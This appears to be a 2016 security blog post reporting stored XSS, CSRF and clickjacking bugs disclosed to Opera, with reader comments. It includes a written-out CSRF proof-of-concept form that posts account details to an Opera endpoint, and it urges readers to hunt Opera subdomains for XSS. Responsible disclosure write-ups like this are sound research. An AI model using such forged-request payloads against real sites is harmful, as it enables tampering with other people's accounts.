Hacker, Researcher and Author.

Stored XSS, CSRF And Clickjacking Vulnerabilities in Opera

Now a days, I am not much active in bug bounty programs, However, still i wanted to share my experience with Opera, Opera does not have a bug bounty program, However they certainly have their own way of thanking researchers by sending them some swag and listing their name under Hall of fame.

I reported few vulnerabilities to opera including a Stored XSS, CSRF and a clickjacking vulnerability. The POC's for the vulnerabilities are as follows:

Stored XSS 

The "Username" input was not being sanitized properly, Which resulted in an execution of javascript.


The form was missing with CSRF tokens, An attacker could have used a CSRF attack in order to manipulate the form details.


    <form action="https://apps.opera.com/en_pk/account.php?action=details" method="POST">
      <input type="hidden" name="email" value="rafaybaloch&#64;gmail&#46;com" />
      <input type="hidden" name="name" value="Rafay&#32;Baloch" />
      <input type="hidden" name="address1" value="f&#45;10&#44;afasf&#32;afs&#32;asf&#32;1&#44;block&#32;15&#32;near&#32;income&#32;tax&#32;office&#44;asssssss&#45;e&#45;johar" />
      <input type="hidden" name="address2" value="" />
      <input type="hidden" name="city" value="Karachi" />
      <input type="hidden" name="state" value="" />
      <input type="hidden" name="country" value="PK" />
      <input type="hidden" name="zip" value="44000" />
      <input type="hidden" name="phone" value="&#43;923333333333" />
      <input type="submit" value="Submit form" />

Opera Hall Of Fame

So, For my findings, Opera listed my name under their hall of fame:

Gift from Opera

As a token of appreciation, they also send me the following gifts:

Opera is still sending some good stuff, I would recommend researchers to start looking opera's subdomains for low hanging fruits such as XSS, I know there is a lot of vulnerabilities out there unfixed.


  1. How can i get subdomains of this site..?

  2. Hey hi. Could you please post some guidelines/rules/tricks on how you work out on bug bounty programs? I would really appreciate that. Thanks a lot!

  3. Could you explain about your xss which you found briefly?

  4. nice work bro.. keep it up :)


© 2016 All Rights Reserved by RHA Info Sec. Top

Contact Form


Email *

Message *

Powered by Blogger.